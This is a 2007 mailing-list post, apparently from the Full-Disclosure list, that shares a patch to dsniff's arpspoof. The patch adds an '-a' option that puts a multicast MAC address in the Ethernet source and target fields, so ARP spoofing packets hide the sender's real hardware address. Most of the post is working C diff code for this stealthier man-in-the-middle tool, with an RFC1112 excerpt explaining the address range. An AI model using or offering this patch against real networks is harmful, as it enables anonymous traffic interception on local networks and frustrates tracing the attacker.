PATCH: Anonymous Spoofing via Multicast ARP (dsniff / arpspoof)

["Kristian Hermansen" <kristian.hermansen () gmail com>]

I am not sure if this technique is widely used or known, but RFC1112
defines multicast link-layer features for use in conjunction with
multicast IP.  You get a reserved address plus 23 bits to play with
which correspond to the least significant bits of a typical multicast
IP in the range of 224.b.c.d.  The range that is reserved begins at
01:00:5e:00:00:00 and ends at 01:00:5e:7f:ff:ff.

<snip>
6.4. Extensions to an Ethernet Local Network Module

  The Ethernet directly supports the sending of local multicast packets
  by allowing multicast addresses in the destination field of Ethernet
  packets.  All that is needed to support the sending of multicast IP
  datagrams is a procedure for mapping IP host group addresses to
  Ethernet multicast addresses.

  An IP host group address is mapped to an Ethernet multicast address
  by placing the low-order 23-bits of the IP address into the low-order
  23 bits of the Ethernet multicast address 01-00-5E-00-00-00 (hex).
  Because there are 28 significant bits in an IP host group address,
  more than one host group address may map to the same Ethernet
  multicast address.
</snip>

khermans@khermans-laptop:~/projects/anonnyarp/dsniff-2.4b1+debian$ cat
dsniff_arpspoof_2.4b1_anon-khermans.patch
--- arpspoof.c.orig     2007-06-22 21:24:26.169638763 -0400
+++ arpspoof.c  2007-06-25 23:08:51.786962797 -0400
@@ -31,12 +31,13 @@
static struct ether_addr spoof_mac, target_mac;
static in_addr_t spoof_ip, target_ip;
static char *intf;
+static int anon;

static void
usage(void)
{
       fprintf(stderr, "Version: " VERSION "\n"
-               "Usage: arpspoof [-i interface] [-t target] host\n");
+               "Usage: arpspoof [-a] [-i interface] [-t target] host\n");
       exit(1);
}

@@ -51,14 +52,20 @@
           (sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {
               return (-1);
       }
+
       if (spa == 0) {
               if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)
                       return (-1);
               spa = htonl(spa); /* XXX */
       }
+
       if (tha == NULL)
               tha = "\xff\xff\xff\xff\xff\xff";

+       if (anon) {
+               sha = tha = "\x01\x00\x5e\x00\x00\x01";
+        }
+
       libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);

       libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,
@@ -154,11 +161,15 @@
       char ebuf[PCAP_ERRBUF_SIZE];
       int c;

+       anon = 0;
       intf = NULL;
       spoof_ip = target_ip = 0;

-       while ((c = getopt(argc, argv, "i:t:h?V")) != -1) {
+       while ((c = getopt(argc, argv, "ahi:t?V")) != -1) {
               switch (c) {
+               case 'a':
+                       anon = 1;
+                       break;
               case 'i':
                       intf = optarg;
                       break;
--
Kristian Hermansen

Attachment: dsniff_arpspoof_2.4b1_anon-khermans.patch
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/